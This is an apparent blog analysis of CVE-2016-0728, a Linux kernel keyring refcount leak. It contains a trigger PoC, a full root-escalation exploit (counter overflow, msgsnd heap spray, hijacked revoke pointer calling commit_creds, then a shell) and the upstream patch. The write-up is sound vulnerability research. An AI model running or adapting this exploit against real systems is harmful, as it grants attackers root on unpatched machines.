Before Anything

A vulnerability caused by a ref-count overflow sounds interesting, doesn't it? The pity is that this CVE is largely theoretical and, from my point of view, hard to exploit. Nevertheless, it is worth getting familiar with this kind of bug and the subsystem around it, and understanding how one would go about exploiting it.

The kernel version used for this post is 4.4.0. (The bug appears to be fixed in v4.4.1.)

Pre-knowledge

Before diving in, we need some basics of the Linux keyring system. The manual gives a short description:

keyrings - in-kernel key management and retention facility

The Linux key-management facility is primarily a way for various kernel components to retain or cache security data, authentication keys, encryption keys, and other data in the kernel. System call interfaces are provided so that user-space programs can manage those objects and also use the facility for their own purposes; see add_key(2), request_key(2), and keyctl(2). A library and some user-space utilities are provided to allow access to the facility. See keyctl(1), keyctl(3), and keyutils(7) for more information.

In addition, this old article gives a further introduction to these APIs and their functionality. The links below are also worth a look.

So far we know that the keyring is used by the kernel to store important data objects, and that an interface is provided for users to manage their own objects. Other aspects are ignored here, since our focus is the bug.

The Bug Itself

The vulnerable code is in the function long join_session_keyring(const char *name) in security/keys/process_keys.c.

Before glancing at the vulnerable source code, let me first introduce what joining a session keyring means.

key_serial_t keyctl_join_session_keyring(const char *name); keyctl_join_session_keyring() changes the session keyring to which a process is subscribed. (manual)

In essence, each process has a session keyring from the moment it is launched. To test this, run keyctl session to spawn a new shell; it prints the ID of the new session keyring.

# keyctl session new
Joined session keyring: 680549283
# keyctl show
Session Keyring
 680549283 --alswrv      0     0  keyring: new

What join_session_keyring does is let the current process subscribe to a session keyring with the given name. The kernel searches for a keyring of that name and creates a new one if the search fails. Either way, once join_session_keyring finishes successfully, the session keyring of the current process has been updated.

Now let us look at the vulnerable function. It is reached from sys_keyctl, defined in security/keys/keyctl.c, which is an exposed system call interface.

/*
 * Join the named keyring as the session keyring if possible else attempt to
 * create a new one of that name and join that.
 *
 * If the name is NULL, an empty anonymous keyring will be installed as the
 * session keyring.
 *
 * Named session keyrings are joined with a semaphore held to prevent the
 * keyrings from going away whilst the attempt is made to going them and also
 * to prevent a race in creating compatible session keyrings.
 */
long join_session_keyring(const char *name)
{
	/* ... */

	/* look for an existing keyring of this name */
	keyring = find_keyring_by_name(name, false);
	if (PTR_ERR(keyring) == -ENOKEY) {
		/* not found - try and create a new one */
		keyring = keyring_alloc(
			name, old->uid, old->gid, old,
			KEY_POS_ALL | KEY_USR_VIEW | KEY_USR_READ | KEY_USR_LINK,
			KEY_ALLOC_IN_QUOTA, NULL);
		if (IS_ERR(keyring)) {
			ret = PTR_ERR(keyring);
			goto error2;
		}
	} else if (IS_ERR(keyring)) {
		ret = PTR_ERR(keyring);
		goto error2;
	} else if (keyring == new->session_keyring) {
		/* The supplied name matches the current session keyring */
		ret = 0;
		goto error2; 	// <== BUG HERE
	}
	/* ... */
	key_put(keyring);
okay:
	return ret;

error2:
	mutex_unlock(&key_session_mutex);
error:
	abort_creds(new);
	return ret;
}

The vulnerable point is at line 798.

	} else if (keyring == new->session_keyring) {
		/* The supplied name matches the current session keyring */
		ret = 0;
		goto error2; 	// <== BUG HERE
	}

When control flow reaches this block, the keyring name supplied by the user matches the current session keyring exactly. No update is required, so ret is set to 0. However, the code jumps straight to error2 and forgets one thing.

What is it?

	} else if (IS_ERR(keyring)) {
		ret = PTR_ERR(keyring);
		goto error2;
	} 

Compare the other branch, where IS_ERR(keyring) is true. That block does almost the same as the vulnerable branch: it sets ret and jumps to error2. It seems to make sense, so how can a bug occur?

To explain what was forgotten, we have to look into find_keyring_by_name(). This function does not just find and return the keyring, it also increments the keyring's refcount.

/*
 * Find a keyring with the specified name.
 *
 * All named keyrings in the current user namespace are searched, provided they
 * grant Search permission directly to the caller (unless this check is
 * skipped).  Keyrings whose usage points have reached zero or who have been
 * revoked are skipped.
 *
 * Returns a pointer to the keyring with the keyring's refcount having being  // <<== LOOK HERE
 * incremented on success.  -ENOKEY is returned if a key could not be found.
 */
struct key *find_keyring_by_name(const char *name, bool skip_perm_check)
{
	/* ... */
	if (keyring_name_hash[bucket].next) {
		/* search this hash bucket for a keyring with a matching name
		 * that's readable and that hasn't been revoked */
		list_for_each_entry(keyring,
				    &keyring_name_hash[bucket],
				    name_link
				    ) {
			/* ... */
			/* we've got a match but we might end up racing with
			 * key_cleanup() if the keyring is currently 'dead'
			 * (ie. it has a zero usage count) */
			if (!atomic_inc_not_zero(&keyring->usage))
				continue;
			/* ... */
			keyring->last_used_at = current_kernel_time().tv_sec;
			goto out;
		}
	}

	keyring = ERR_PTR(-ENOKEY);
out:
	read_unlock(&keyring_name_lock);
	return keyring;
}

So now you know what happens when a user asks to join a session keyring that the process is already subscribed to: the ref-count of that keyring is erroneously incremented and never decremented.
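The leak can be modelled in user space. The following is only a sketch under my own assumptions: struct model_key, model_find(), model_put() and model_join() are hypothetical stand-ins for struct key, find_keyring_by_name(), key_put() and the matching-name branch of join_session_keyring(); none of them are kernel APIs.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for struct key: only the fields the model needs. */
struct model_key {
	const char *name;
	unsigned int usage;	/* plays the role of key->usage */
};

/* Like find_keyring_by_name(): a successful lookup takes a reference. */
struct model_key *model_find(struct model_key *k, const char *name)
{
	if (k == NULL || strcmp(k->name, name) != 0)
		return NULL;
	k->usage++;
	return k;
}

/* Like key_put(): drop one reference. */
void model_put(struct model_key *k)
{
	assert(k->usage > 0);
	k->usage--;
}

/*
 * Model of the "name matches the current session keyring" branch.
 * With fixed == 0 the lookup reference is never dropped (the behaviour
 * described above); with fixed != 0 it is dropped before the early exit.
 */
int model_join(struct model_key *session, const char *name, int fixed)
{
	struct model_key *found = model_find(session, name);

	if (found == NULL)
		return -1;	/* the real code would create a keyring here */

	/* found == session: nothing to update, so exit early */
	if (fixed)
		model_put(found);
	return 0;
}

/* Call model_join() n times and report the resulting usage count. */
unsigned int model_usage_after(unsigned int n, int fixed)
{
	struct model_key session = { "leaked-keyring", 1 };
	unsigned int i;

	for (i = 0; i < n; i++)
		model_join(&session, "leaked-keyring", fixed);
	return session.usage;
}
```

In this model, model_usage_after(100, 0) ends at 101 (the initial reference plus 100 leaked ones), while model_usage_after(100, 1) stays at 1.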

Triggering

The code to trigger this bug is also quite clear.

#include <stddef.h>
#include <stdio.h>
#include <sys/types.h>
#include <keyutils.h>

int main(int argc, const char *argv[])
{
	int i = 0;
	key_serial_t serial;

	serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING,
			"leaked-keyring"); 	// first time, create this keyring
	if (serial < 0) {
		perror("keyctl");
		return -1;
	}
	printf("create keyring: %d\n", serial);

	/*
	 * Set the key permissions:
	 * KEY_POS_ALL grants view, read, write, search, link and setattr
	 * to a process that possesses the key;
	 * KEY_USR_ALL grants the same permissions to the key's owning user.
	 */
	if (keyctl(KEYCTL_SETPERM, serial,
		   KEY_POS_ALL | KEY_USR_ALL) < 0) {
		perror("keyctl");
		return -1;
	}

	for (i = 0; i < 100; i++) {
		serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, 	// keep triggering
				"leaked-keyring");
		if (serial < 0) {
			perror("keyctl");
			return -1;
		}
	}

	return 0;
}

This PoC is supposed to leak 100 extra references on the keyring named “leaked-keyring”. This can be verified by looking at /proc/keys.

# cat /proc/keys
1028f9de I--Q---     2 perm 1f3f0000     0 65534 keyring   _uid.0: empty
25a12564 I------     1 perm 1f030000     0     0 keyring   .id_resolver: empty
297781ea I--Q---     1 perm 1f3f0000     0 65534 keyring   _uid_ses.0: 1
33a188fa I------     1 perm 1f030000     0     0 keyring   .dns_resolver: empty
[    8.840313] cat (968) used greatest stack depth: 13648 bytes left
# ./poc
create keyring: 330089631
# cat /proc/keys
1028f9de I--Q---     2 perm 1f3f0000     0 65534 keyring   _uid.0: empty
13acc49f I--Q---   100 perm 3f3f0000     0     0 keyring   leaked-keyring: empty
25a12564 I------     1 perm 1f030000     0     0 keyring   .id_resolver: empty
297781ea I--Q---     1 perm 1f3f0000     0 65534 keyring   _uid_ses.0: 1
33a188fa I------     1 perm 1f030000     0     0 keyring   .dns_resolver: empty
[Serial][Flags][Usage][Expiry][Permissions][UID][GID][TypeName][Description] :[Summary]

After the PoC has run, the keyring named leaked-keyring still exists, even though the process that joined it has already exited, and its ref-count is 100! Quite amazing…
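Reading the usage column by eye gets tedious, so here is a small sketch that pulls it out of a /proc/keys line. The field order follows the legend shown above; the struct and the function names parse_proc_keys_line() and usage_of_key() are my own, and the parser assumes the description contains no colon.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Fields of one /proc/keys line, in the order given by the legend. */
struct proc_key_line {
	unsigned int serial;
	char flags[16];
	int usage;
	char expiry[16];
	unsigned int perm;
	int uid;
	int gid;
	char type[32];
	char description[64];
};

/* Parse one line; returns 0 on success, -1 if the line does not match. */
int parse_proc_keys_line(const char *line, struct proc_key_line *out)
{
	int n;

	assert(line != NULL && out != NULL);
	n = sscanf(line, "%x %15s %d %15s %x %d %d %31s %63[^:]",
		   &out->serial, out->flags, &out->usage, out->expiry,
		   &out->perm, &out->uid, &out->gid, out->type,
		   out->description);
	return n == 9 ? 0 : -1;
}

/*
 * Scan a /proc/keys-style file and return the usage count of the first
 * key whose description matches, or -1 if it is missing or unreadable.
 */
int usage_of_key(const char *path, const char *description)
{
	char buf[256];
	struct proc_key_line k;
	int usage = -1;
	FILE *f = fopen(path, "r");

	if (f == NULL)
		return -1;
	while (fgets(buf, sizeof(buf), f) != NULL) {
		if (parse_proc_keys_line(buf, &k) == 0 &&
		    strcmp(k.description, description) == 0) {
			usage = k.usage;
			break;
		}
	}
	fclose(f);
	return usage;
}
```

Calling usage_of_key("/proc/keys", "leaked-keyring") before and after running the PoC should show the counter growing; stray kernel log lines in the output simply fail to parse and are skipped.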

Exploiting

The most direct effect of this vulnerability is a denial-of-service attack: the session keyring is kept by the kernel and wastes resources.

Is there any chance for an attacker to take this ref-count bug further? The answer is yes.

As the PoC above shows, a simple loop pushes the ref-count of the session keyring to 100. What about a larger number? The ref-count is stored as an atomic_t.

struct key {
	atomic_t		usage;		/* number of references */
	/* ... */
};

Good news! atomic_t is always 32 bits wide, even on 64-bit architectures. Incrementing the ref-count 2^32 times is still quite crazy, but it is possible. After that, once the ref-count of this keyring object reaches zero again, the key object is released even though the current session is still alive, much like the double-freed sock in ping-pong root.

This can be turned into a use-after-free if we can allocate a new, controllable object in the released memory.

In fact, how to do that puzzled me for quite a long time. The key object is allocated and released as follows.
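To get a feeling for the numbers, the wraparound arithmetic can be sketched with a plain uint32_t. This is only an illustration: the kernel counter is a signed int inside atomic_t, the helper names are mine, and any calls-per-second rate fed into hours_to_wrap() is a pure assumption that depends on the machine.

```c
#include <assert.h>
#include <stdint.h>

/* Value of a 32-bit counter after `increments` additions, modulo 2^32. */
uint32_t wrap_add(uint32_t start, uint64_t increments)
{
	return (uint32_t)(start + increments);
}

/* Leaked references needed to bring the counter from `start` back to 0. */
uint64_t leaks_until_zero(uint32_t start)
{
	assert(start != 0);
	return (UINT64_C(1) << 32) - start;
}

/* Rough duration in hours for an assumed rate of leaking calls per second. */
double hours_to_wrap(uint32_t start, double calls_per_second)
{
	assert(calls_per_second > 0.0);
	return (double)leaks_until_zero(start) / calls_per_second / 3600.0;
}
```

Starting from a count of 1, leaks_until_zero(1) is 0xffffffff, which matches the total number of join calls made by the two loops of the exploit shown later. At an assumed one million calls per second that is roughly 1.2 hours; at one hundred thousand per second it is about 12 hours.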

// security/keys/key.c
struct key *key_alloc(struct key_type *type, const char *desc,
		      kuid_t uid, kgid_t gid, const struct cred *cred,
		      key_perm_t perm, unsigned long flags)
{
	/* allocate and initialise the key and its description */
	key = kmem_cache_zalloc(key_jar, GFP_KERNEL);
	/* ... */
}
EXPORT_SYMBOL(key_alloc);

Oops, allocation and release of the key object is handled by the kmem_cache key_jar. My first thought was that we cannot easily place another object in the old memory through the well-known sendmsg spraying or add_key spraying, because only objects managed by key_jar should end up in the corresponding slab pages. Another idea is physmap spraying: if the page containing the released key is freed by key_jar and handed to another kmem_cache, or can be obtained through mmap, we can write malicious content into it. But that is too hard, since releasing even one in-use key takes a long time, not to mention a whole page of key objects.

Shame on me, deceived by the Linux memory management system once again… The truth is far simpler than I thought.

void __init key_init(void)
{
	/* allocate a slab in which we can store keys */
	key_jar = kmem_cache_create("key_jar", sizeof(struct key),
			0, SLAB_HWCACHE_ALIGN|SLAB_PANIC, NULL);
	/* ... */
}

By dynamically debugging the construction of key_jar, I found that it is merged into the existing kmem_cache kmalloc-192, because the cache alias (slab merging) optimization is enabled.

The last time I ran into the cache alias pitfall was in ping-pong root: I found that the ping cache is merged into another cache on 32-bit architectures, which results in an unstable SLUB state.

Luckily, the merged kmem_cache is one of the kmalloc pools. It is therefore quite possible to get hold of the released key object and fill it with malicious content.

Now we can have a look at the original exploit code.
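Why kmalloc-192 in particular? The size arithmetic can be sketched as below. Everything here is an assumption on my side: the size-class table is the usual general-purpose kmalloc ladder seen with SLUB on x86-64, 0xb8 is taken as sizeof(struct key) because that is the value the exploit's STRUCT_LEN starts from, and 64 is an assumed cache-line size. It is not the kernel's actual merge logic.

```c
#include <assert.h>
#include <stddef.h>

/* Assumed general-purpose kmalloc size classes (SLUB, x86-64). */
const size_t kmalloc_sizes[] = {
	8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Smallest size class that can hold `size` bytes, or 0 if none fits. */
size_t kmalloc_class(size_t size)
{
	size_t i;

	for (i = 0; i < sizeof(kmalloc_sizes) / sizeof(kmalloc_sizes[0]); i++)
		if (size <= kmalloc_sizes[i])
			return kmalloc_sizes[i];
	return 0;
}

/* Round `size` up to a multiple of `align`, which must be a power of two. */
size_t align_up(size_t size, size_t align)
{
	assert(align != 0 && (align & (align - 1)) == 0);
	return (size + align - 1) & ~(align - 1);
}
```

With these assumptions, align_up(0xb8, 64) gives 192 for the cache-line aligned key object, and kmalloc_class(0xb8) also gives 192, so an ordinary kmalloc allocation of the same size lands in the same pool. That is presumably why the exploit sizes its message payload as 0xb8 minus 0x30, which I take to be the message header.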

/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */
/* $ ./cve_2016_0728 PP_KEY */

/* Modified: iteration count of the second for loop */
/* Adjusted: sleep durations */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <keyutils.h>
#include <unistd.h>
#include <time.h>

#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <fcntl.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

#define STRUCT_LEN (0xb8 - 0x30)
#define COMMIT_CREDS_ADDR (0xffffffff8106df50)
#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff8106e310)

struct key_type {
    char * name;
    size_t datalen;
    void * vet_description;
    void * preparse;
    void * free_preparse;
    void * instantiate;
    void * update;
    void * match_preparse;
    void * match_free;
    void * revoke;
    void * destroy;
};

void userspace_revoke(void * key) {
    commit_creds(prepare_kernel_cred(0));
}

int main(int argc, const char *argv[])
{
	const char 			*keyring_name;
	size_t				i = 0;
    unsigned long int	l = 0x100000000/2;
	key_serial_t		serial = -1;
	pid_t 				pid = -1;
    struct key_type 	*my_key_type = NULL;
    int					msqid;
	
	struct 
	{
		long mtype;
		char mtext[STRUCT_LEN];
	} msg = {0x4141414141414141, {0}};
	
	if (argc != 2) {
		puts("usage: ./keys <key_name>");
		return 1;
	}

    printf("uid=%d, euid=%d\n", getuid(), geteuid()); 
    commit_creds = (_commit_creds) COMMIT_CREDS_ADDR;
    prepare_kernel_cred = (_prepare_kernel_cred) PREPARE_KERNEL_CREDS_ADDR;
    
    my_key_type = malloc(sizeof(*my_key_type));
    my_key_type->revoke = (void*)userspace_revoke;	// backdoor function
	
    memset(msg.mtext, 'A', sizeof(msg.mtext));
	
    // key->uid
    *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */
	
    //key->perm
    *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;
	
    //key->type
    *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;
	
    if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
        perror("msgget");
        exit(1);
    }
	
    keyring_name = argv[1];
	
	/* Set the new session keyring before we start */
	serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);
	
	if (serial < 0) {
		perror("keyctl");
		return -1;
    }
	
	if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {
		perror("keyctl");
		return -1;
	}

	puts("Increfing...");
	
    for (i = 1; i < 0xfffffffd; i++) {
        if (i == (0xffffffff - l)) {
            l = l/2;
            sleep(5);
        }
        if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
            perror("keyctl");
            return -1;
        }
    }
	
    sleep(20);
	
    /* here we are going to leak the last references to overflow */
    for (i=0; i<3; ++i) {
        if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
            perror("keyctl");
            return -1;
        }
    }
	
    puts("finished increfing");
    puts("forking...");
	
    /* allocate msg struct in the kernel rewriting the freed keyring object */
    for (i = 0; i < 64;i++) {
        pid = fork();
		
        if (pid == -1) {
            perror("fork");
            return -1;
        }

        if (pid == 0) {
            sleep(2);
			
            if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
                perror("msgget");
                exit(1);
            }
			
            for (i = 0; i < 64; i++) {
                if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
                    perror("msgsnd");
                    exit(1);
                }
            }
			
            sleep(-1);
            exit(1);
        }
    }
    
    puts("finished forking");
    //sleep(5);
    
    /* call userspace_revoke from kernel */
    puts("caling revoke...");
    if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {
        perror("keyctl_revoke");
    }
    
    printf("uid=%d, euid=%d\n", getuid(), geteuid());
		
    execl("/bin/sh", "/bin/sh", NULL);
	
    return 0;
}

The idea of this exploit is to make the revoke function pointer, reached through key->type, point to a malicious user-space backdoor function. The spraying method it adopts is msgsnd spraying, since it allows a flexible length for kmalloc.

But here comes the last question: will this exploit work?

Theoretically, everything should function as we expect, but reality is cruel. The long discussion under the official PoC reveals that this exploit does not work on many machines, and the program is quite likely to hang your machine or emulator.

One big reason for that is the RCU mechanism. Check this blog for an overview.

In a nutshell, the precise moment at which the ref-count is zero is difficult to catch. In join_session_keyring(), prepare_creds() first increments the ref-count of cred->session_keyring (exactly the keyring we target), and find_keyring_by_name(), which we already discussed, increments it again, so the ref-count goes up by 2. When the function is about to return, abort_creds() is called to decrement the ref-count by 1. However, this is done as RCU work. We have no idea when the decrements will actually happen (even though sleep() is called to wait for them), so the right moment to start calling msgsnd is very unclear. If we start too late, the object may already have been allocated to someone else.

And that is why I called this bug “hard to exploit” at the very beginning. I don’t know whether there is a clever way to solve the RCU problem; maybe that is future work for me. For now, I just feel sad waiting for the 2^32 ref-count overflow to happen.
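The gap between what the counter reads now and where it will settle can be shown with a toy model. This is a sketch with hypothetical names (struct deferred_ref, model_join_same(), model_grace_period(), model_settled_usage()); real RCU callbacks run in batches at times user space cannot observe, which the model collapses into a single explicit call.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical model: a 32-bit usage counter plus puts queued for later. */
struct deferred_ref {
	uint32_t usage;		/* what key->usage would read right now */
	uint32_t pending_puts;	/* decrements deferred by RCU, not yet applied */
};

/* One join on the already-joined keyring: two gets now, one put deferred. */
void model_join_same(struct deferred_ref *r)
{
	assert(r != NULL);
	r->usage += 2;		/* prepare_creds() + find_keyring_by_name() */
	r->pending_puts += 1;	/* abort_creds() drops its reference later */
}

/* A grace period elapses: every queued put is applied at once. */
void model_grace_period(struct deferred_ref *r)
{
	assert(r != NULL);
	r->usage -= r->pending_puts;
	r->pending_puts = 0;
}

/* Value the counter will settle at once every queued put has run. */
uint32_t model_settled_usage(const struct deferred_ref *r)
{
	assert(r != NULL);
	return r->usage - r->pending_puts;
}
```

Starting from a usage of 1, ten calls to model_join_same() leave the counter reading 21 while it will eventually settle at 11. The exploit has no way to read pending_puts, which is why it can only sleep and hope the queued decrements have run.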

Patching

The patch for this vulnerability is quite simple.

--- a/security/keys/process_keys.c
+++ b/security/keys/process_keys.c
@@ -794,6 +794,7 @@ long join_session_keyring(const char *name)
 		ret = PTR_ERR(keyring);
 		goto error2;
 	} else if (keyring == new->session_keyring) {
+		key_put(keyring);
 		ret = 0;
 		goto error2;
 	}

The code forgot to call key_put, so the patch calls it this time.